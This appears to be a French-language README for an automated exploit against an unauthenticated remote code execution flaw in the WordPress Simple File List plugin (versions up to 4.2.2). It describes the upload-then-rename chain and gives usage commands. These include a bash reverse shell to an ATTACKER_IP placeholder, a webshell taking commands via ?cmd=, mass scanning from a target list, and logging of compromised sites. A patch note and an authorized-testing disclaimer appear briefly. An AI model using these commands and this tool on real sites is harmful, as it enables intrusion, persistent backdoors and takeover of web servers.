
Exploit pour CVE-2025-34085
Un exploit automatisé pour CVE-2025-34085 (doublon de CVE-2020-36847), une vulnérabilité critique d'exécution de code à distance non authentifiée dans le plugin WordPress Simple File List versions ≤ 4.2.2.
Note : CVE-2025-34085 a été rejeté par MITRE comme un doublon de CVE-2020-36847. La vulnérabilité est réelle et corrigée dans la version 4.2.3. Les deux identifiants CVE font référence au même problème sous-jacent.
| Champ | Détail |
|---|---|
| CVE | CVE-2025-34085 / CVE-2020-36847 |
| Plugin | Simple File List |
| Versions affectées | ≤ 4.2.2 |
| Version corrigée | 4.2.3 |
| Type | Téléversement de fichier sans restriction → Contournement par renommage → RCE |
| CVSS | 9.8 (Critique) |
| Authentification | Aucune requise |
| Découverte originale | coiffeur |
| Module Metasploit | exploit/multi/http/wp_simple_file_list_rce |
Téléversement — Une charge utile PHP est téléversée déguisée en fichier .png via le point de terminaison de téléversement du plugin (ee-upload-engine.php). Le moteur de téléversement valide les extensions mais accepte les fichiers image.
Renommage — La fonctionnalité de renommage du plugin (ee-file-engine.php) n'applique pas de restrictions d'extension. L'attaquant renomme le .png en .php (ou .phtml, .php5, .php3).
Exécution — Le fichier PHP renommé est maintenant accessible et exécutable dans le répertoire des téléversements à /wp-content/uploads/simple-file-list/, donnant à l'attaquant une exécution de commande arbitraire.
pip install requests colorama
Python 3.6+
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
?cmd=)python3 CVE-2025-34085.py -u http://target.com --cmd "bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'" --inline
Créez un fichier targets.txt avec une URL par ligne :
http://target1.com
http://target2.com
https://target3.com
python3 CVE-2025-34085.py --cmd "id"
Astuce : Utilisez
--inlinelorsque vous avez besoin d'un reverse shell ou lorsque la cible a un filtrage de chaîne de requête. Sans--inline, l'exploit dépose un webshell qui accepte les commandes via?cmd=.
Les exploits réussis sont enregistrés dans vuln.txt :
http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php | uid=33(www-data) gid=33(www-data)
/wp-content/uploads/simple-file-list/<random>.phpvuln.txt — utile pour votre rapport--inline avec un reverse shell pour éviter de laisser un webshell persistant avec ?cmd=Mettez à niveau le plugin Simple File List vers la version 4.2.3 ou ultérieure.
Cet outil est destiné uniquement aux tests de pénétration autorisés et à des fins éducatives. L'accès non autorisé aux systèmes informatiques est illégal. Obtenez toujours une autorisation appropriée avant de tester.
| Argument | Description | Défaut |
|---|
-u, --url | URL de la cible unique | — |
--cmd | Commande à exécuter sur la cible | id |
--inline | Injecter la commande directement dans le shell PHP (codé en dur, pas de webshell via ?cmd=) | False |